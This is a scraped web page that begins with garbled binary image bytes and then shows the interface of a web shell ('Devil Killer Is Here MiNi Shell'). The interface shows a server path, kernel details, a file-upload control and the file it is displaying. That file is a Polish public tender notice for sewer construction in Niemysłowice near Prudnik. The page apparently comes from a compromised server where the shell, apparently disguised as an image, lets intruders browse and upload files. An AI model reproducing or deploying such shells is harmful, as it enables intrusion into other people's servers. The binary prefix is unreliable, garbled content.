JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/9224-N-2015.html

<p class="kh_header"><b>Prudnik: Budowa kanalizacji sanitarnej wraz z przyłączami w miejscowości Niemysłowice w drodze powiatowej realizowana w ramach operacji pn.: Budowa sieci kanalizacyjnej sanitarnej grawitacyjnej wraz z przyłączami w miejscowości Niemysłowice - ETAP II</b><br>
<b>Numer ogłoszenia: 9224 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Jednoosobowa Spółka Gminy Prudnik Sp. z o.o. , ul. Poniatowskiego 1, 48-200 Prudnik, woj. opolskie, tel. 077 4363617, faks 077 4363617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwikprudnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego ze 100% udziałem gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej wraz z przyłączami w miejscowości Niemysłowice w drodze powiatowej realizowana w ramach operacji pn.: Budowa sieci kanalizacyjnej sanitarnej grawitacyjnej wraz z przyłączami w miejscowości Niemysłowice - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest wykonanie odcinka kanalizacji sanitarnej grawitacyjnej wraz z przyłączami w drodze powiatowej Nr 1612 O oraz odtworzenie nawierzchni drogowej po budowie w/w kanalizacji.

II. Zakres robót, które należy wykonać w ramach niniejszego zamówienia:

1. Budowa kanalizacji sanitarnej grawitacyjnej z rur PVC O 300 i O 200 - w drodze powiatowej nr. 1612 O zlokalizowanej w miejscowość Niemysłowice wraz z przyłączami kanalizacyjnymi O 160, zakres wg. przedmiaru robót.

W załączniki nr 13 do SIWZ przedstawiono odcinki kanalizacji sanitarnej przeznaczone do wykonania przez Wykonawcę zamówienia.

2. Odtworzenie nawierzchni drogowych w miejscowości Niemysłowice w miejscu budowy sieci kanalizacji sanitarnej obejmować będzie:  
a) wycięcie lub sfrezowanie uszkodzonych miejsc nawierzchni z nadaniem regularnych kształtów, 
b) wykorytowanie podłoża pod budowę warstw konstrukcyjnych i nowej nawierzchni w śladzie wykopu,
c) profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w śladzie wykopu,
d) wykonanie podbudowy  - warstwy dolnej z kruszywa łamanego (tłucznia) o grubości warstwy 20 cm po zagęszczeniu w śladzie wykopu,
e) wykonanie podbudowy  - warstwy górnej z kruszywa łamanego (tłucznia) o grubości warstwy 10 cm po zagęszczeniu w śladzie wykopu (podbudowa pod ułożenie warstw mineralno - bitumicznych),
f) ułożenie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych - warstwa wiążąca asfaltowa o grubości po zagęszczeniu 4 cm w śladzie wykopu:
g) ułożenie nawierzchni z mieszanki mineralno - bitumicznych asfaltowych - warstwa ścieralna o grubości 4 cm  w śladzie wykopu:
h) ułożenie do niwelety drogi wszystkich urządzeń infrastruktury wodociągowej i kanalizacyjne.
Zadaniem Wykonawcy zamówienie jest odtworzenie całej szerokości drogi powiatowej na odcinkach sieci: 
od studni  SN 39 do studni SN 39.1 oraz do  studni SN 41 do studni 41.2.
Na wyżej wymienionych odcinkach wykonawca musi sfrezować całą szerokość nawierzchni asfaltowej a następnie na całej szerokości wykonać warstwę wiążąc (4 cm)  i ścieralną nawierzchni asfaltowej (4 cm).

3. Szczegółowy opis przedmiotu zamówienia opisano w SIWZ i załącznikach:
1). Projekt wykonawczy: Budowy sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami w miejscowości Niemysłowice.                                                            -  załącznik nr 9.
2). Specyfikacje techniczne do projektu: Budowy sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami w miejscowości Niemysłowice.                                     - załącznik nr 10.
3). Przedmiar robót                                                                                - załącznik nr 11.
4). Oświadczenie projektanta                                                                - załącznik nr 12.
5). Wyciąg z projektu budowlanego odcinków sieci kanalizacji sanitarnej będących przedmiotem wykonania zamówienia zagonie z SIWZ                                                                 - załącznik nr 13.
6). Pozwolenie na budowę                                                                     - załącznik nr 14.
7). Zatwierdzenie czasowej organizacji ruchu                                       - załącznik nr 15.
8). Decyzja na lokalizację kanalizacji sanitarnej wraz z przyłączami w pasie drogi powiatowej  - załącznik nr 16.

Projekt organizacji ruchu na czas robót w pasie drogowym dostępny jest w siedzibie Zamawiającego.
8. Wymienione załączniki w SIWZ wraz z całą dokumentacją projektową są do wglądu w siedzibie Zamawiającego. Wykonawca może zapoznać się z całą dokumentacją projektową w tym z zatwierdzonym projektem budowlanym i pozwoleniem na budowę. Wykonawca może skopiować dokumentację, koszt skopiowania pokrywa Wykonawca. 
III.   Informacje dotyczące materiałów budowlanych:
1) Wymienione materiały instalacyjne przewidziane do realizacji zadania zapewnia Zamawiający tj.:
- rury PVC O300 i O200 oraz O160,
- kompletne studnie betonowe  O1000,
- kompletne studnie O425 i 315,
- korki, trójniki i kolana PVC,
- środek poślizgowy.

Materiały instalacyjne dostępne będą w magazynie znajdującym się w siedzibie Zamawiającego - ul. Poniatowskiego 1 w Prudniku. Materiał przekazany zostanie Wykonawcy zamówienia. Zadaniem Wykonawcy będzie zapewnienie załadunku, transportu, rozładunku przekazanych materiałów instalacyjnych do budowy kanalizacji sanitarnej.
Za uszkodzenia i zabezpieczenie przekazanych materiałów odpowiada Wykonawca zamówienia.
2) Materiały sypkie przeznaczone do wykonania osypek i zasypek rur oraz do zasypania wykopu tj: piasek i pospółkę zapewnia Zamawiający. 
Materiały sypkie znajdują się na placu magazynowym materiałów sypkich Zamawiającego ul. Poniatowskiego 1 w Prudniku. Zadaniem Wykonawcy będzie zapewnienie sobie załadunku, transportu, rozładunku przekazanych materiałów sypkich do budowy kanalizacji sanitarnej. 

Inne materiały sypkie - kruszywa (tłuczeń) przeznaczone do wykonania podbudowy drogi zapewnia Wykonawca zamówienia.
3) Materiały przewidziane do wykonania odtworzenia nawierzchni drogowych zapewnia Wykonawca zamówienia.
4) Wymiana gruntu:
Projekt przewiduje całkowitą wymianę gruntu na odcinkach sieci kanalizacji zlokalizowanych w pasie drogowym (jezdnia), a na poboczach  utwardzonych i chodnikach może pozostać istniejący grunt, gdy będzie nadawał się do zagęszczenia.
Wywóz gruntu i jego późniejsze zagospodarowanie jest staraniem Wykonawcy zamówienia.
Informacje dotyczące wymiany gruntu zawarte są w projekcie wykonawczym - załącznik nr 9.

IV. Wymagania organizacyjne:
- przed przystąpieniem do realizacji zadania nastąpi przekazanie placu budowy - do 5 dni od daty zawarcia umowy.
- przed przystąpieniem do robót Wykonawca Zamówienia - kierownik robót powiadomi właściciela działki o zamiarze rozpoczęcia prac, zostanie spisany z Zamawiającym protokół przekazania terenu. Uprawniony kierownik z ramienia Wykonawcy podpisze oświadczenie o przejęciu obowiązków kierownika.
- Wykonawca jest zobowiązany do wniesienia opłat za zajęcie pasa drogowego na czas wykonania przedmiotu zamówienia.
- Wykonawca robót zapewni nadzór techniczny oraz obsługę geodezyjną zamówienia przez uprawnionego geodetę,  nadzór nad pracownikami w zakresie porządku i dyscypliny pracy, koordynację działań ewentualnych podwykonawców, zapewni pracownikom warunki socjalne, zabezpieczy zaplecze budowy, oznakuje i zabezpieczy teren wykonywania prac.
- Wykonawca jest odpowiedzialny, za jakości, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
- Kierownicy robót zobowiązani są do dokonania wpisów do dziennika budowy.  
V. Wizja lokalna
Zamawiający wymaga od Wykonawcy przeprowadzenia wizji lokalnej w miejscowości Niemysłowice - w miejscu planowanych robót oraz z miejscem przechowywania przez Zamawiającego materiałów do budowy kanalizacji tj. magazyn materiałów instalacyjnych i sypkich.
W trakcie wizji lokalnej Wykonawca będzie mógł zapoznać się z terenem i warunkami prowadzenia prac w celu prawidłowej wyceny zamówienia oraz poprawnym sporządzeniu oferty.
Wizja lokalna musi odbyć się do dnia 29.01.2014r. Termin wizji lokalnej powinien być ustalony z Zamawiającym telefonicznie lub pisemnie, z co najmniej 1 dniowym wyprzedzeniem. Przeprowadzenie wizji lokalnej będzie udokumentowane spisaniem protokołu. 

Zamawiający zastrzega, że oceniane będą tylko te oferty Wykonawców, którzy przeprowadzili wizje lokalną w miejscu wskazanym przez Zamawiającego.

Wykonawca zamówienia po wcześniejszym powiadomieniu Zamawiającego może zapoznać się z dokumentacją projektową w siedzibie Zamawiającego.
VI. Odbiór robót:
Wykonawca zgłasza Zamawiającemu odbiór robót ulegających zanikowi wraz z próbami szczelności dla kanalizacji, celem stwierdzenia ich należytego wykonania, oraz spisze protokoły prób szczelności.
W trakcie kontroli Zamawiający może nakazać przerwania prac po zgłoszeniu uwag i zaistniałych nieprawidłowości Wykonawcy. Wykonawca zobowiązany jest do wykonania poprawek zgłoszonych przez Zamawiającego.

Po wykonaniu całości prac obejmujących przedmiot zamówienia na zgłoszenie Wykonawcy, Zamawiający przystąpi do odbioru całości robót - co będzie potwierdzone spisaniem protokołu. 
Wykonawca zamówienia wykona na własny koszt kamerownie ułożonej sieci kanalizacji sanitarnej po wykonaniu prób szczelności i wykonaniu zasypki oraz zagęszczeniu wykopu. Film z kamerownia wraz z profilami podłużnymi przekaże na płycie CD Zamawiającemu, profile należy przekazać również w formie papierowej.
Wykonawca zgłosi gotowość do przeprowadzenie prób szczelności kanalizacji powiadamiając o tym z trzy dniowym wyprzedzeniem Zamawiającego. Próby szczelności muszą być przeprowadzone w obecności przedstawiciela Zamawiającego i udokumentowane spisaniem protokołu. 

Wykonawca zamówienia musi przekazać Zamawiającemu operat geodezyjny powykonawczy zatwierdzony w miejscowym ośrodku dokumentacji geodezyjnej (Powiatowy Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Prudniku)  w ilości 3 szt.

Wykonawca zamówienia zobowiązany jest do zgłoszenia i przeprowadzenia obioru odtworzonego pasa jezdni z właścicielem nieruchomości (drogi) i Zamawiającym. Wykonawca musi spisać protokół odbioru z właścicielem nieruchomości (drogi) i przekazać go Zamawiającemu. 
W czasie odbioru Zamawiający może żądać od Wykonawcy wykonania odwiertów (w miejscach wskazanych przez Zamawiającego) w celu pobrania próbek odtworzonej nawierzchni i ich oceny.
Wykonawca zamówienia przekaże Zamawiającemu aprobaty techniczne i deklaracje zgodności na materiały wykorzystane do odtworzenia nawierzchni oraz wymagane dla tych materiałów wyniki badań laboratoryjnych.
Wykonawca zamówienia musi uzyskać skwitowanie należytego przywrócenia terenu z właścicielami poszczególnych posesji gdzie były prowadzone roboty.
VII.  Warunki gwarancji i serwisu: 
Wykonawca udzieli Zamawiającemu minimum 36 miesięcy gwarancji obejmujący cały zakres zamówienia.
Okres gwarancji liczony jest od daty podpisania protokołu końcowego. Okres rękojmi wynosi 36 miesięcy od dnia podpisania protokołu odbioru końcowego.
Usterki na pisemne lub telefoniczne zgłoszenie Zamawiającego muszą być usunięte przez Wykonawcę w terminie do 7 dni od zgłoszenia. 

VIII. Do oferty przetargowej Wykonawcy ubiegający się o zamówienie musi załączyć w języku polskim:
- kosztorys sporządzony na podstawie przedmiaru robót załączonego do SIWZ,
-  aprobaty techniczne i deklaracje zgodności na materiały, jakie będą wykorzystane do odtworzenia nawierzchni drogowych (wzory). 

IX. Rozliczenie za wykonanie przedmiotu zamówienia (bez zastrzeżeń), odbędzie się po dostarczeniu przez Wykonawcę zamówienia fakturę VAT z podanym kontem bankowym. Faktura powinna być z 30 dniowym terminem płatności.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. do 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 4
000,00 zł. (słownie: cztery tysiące złotych). Wadium wnosi się przed upływem terminu składania ofert. W przepadku wniesienia wadium w formie pieniężnej należy
dokonać przelewu na rachunek bankowy Zamawiającego: ING Bank Śląski S.A. O/Nysa. Nr rachunku: 58 1050 1490 1000 0022 7794 8770. Do oferty należy
dołączyć oryginał lub kopię polecenia przelewu potwierdzoną za zgodność z oryginałem. Wadium wnoszone w innych dopuszczalnych przez Zamawiającego formach
w oryginale dołączyć do oryginału oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wskazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, iż Wykonawca spełnił warunki w zakresie wiedzy i doświadczenia: Jeśli wykaże, że w ciągu ostatnich pięciu lat przed upływem
terminu składania ofert do udziału w w/w postępowaniu, a jeśli okres prowadzenia działalności jest krótszy to w okresie tej działalności, wykonał zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończył co najmniej dwóch różnych zadań polegających na budowie kanalizacji sanitarnej o wartości nie
mniejszej niż 200 000,00 PLN każde zadanie. W celu potwierdzenia spełnienia niniejszego warunku Wykonawca zobowiązany jest przedłożyć: - wykaz
robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie pięciu lat przed upływem
terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania, - sporządzony
według wzoru stanowiącego załącznik nr 5. Wykonawca załącza do dokumentacji ofertowej dokumenty potwierdzające, że te roboty budowlane zostały
wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wskazać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj.: a) wykaże, iż dysponuje osobą, która będzie
pełnić obowiązki kierownikiem robót sanitarnych; b) wykaże, iż dysponuje osobą, która będzie pełnić obowiązki kierownikiem robót drogowych. Osoby ta
muszą posiadać: - wykształcenie techniczne, wymagane kwalifikacje i uprawnienia. Osoby te powinny być członkiem właściwej Izby Samorządu
Zawodowego potwierdzoną zaświadczeniem wydanym przez tę izbę z określonym w nim terminem ważności. Wykonawca musi przedstawić w ofercie
informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia wyżej opisanych osób, które będą uczestniczyć w wykonaniu zamówienia -
według wzoru stanowiącego załącznik nr 6. Osoby ta muszą uczestniczyć, kierować i prowadzić nadzór nad robotami branżowymi w trakcie realizacji
zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje środkami finansowymi lub zdolnością kredytową w wysokości minimum 200 000,00 zł. w tym
celu: Wykonawca załącza do oferty informacje banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek,
potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed
upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aprobaty techniczne, deklaracje zgodności na materiały jakie zamierza wykorzystać w trakcie realizacji zamówienia na odtworzenie nawierzchni drogowych</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwikprudnik.pl<br>
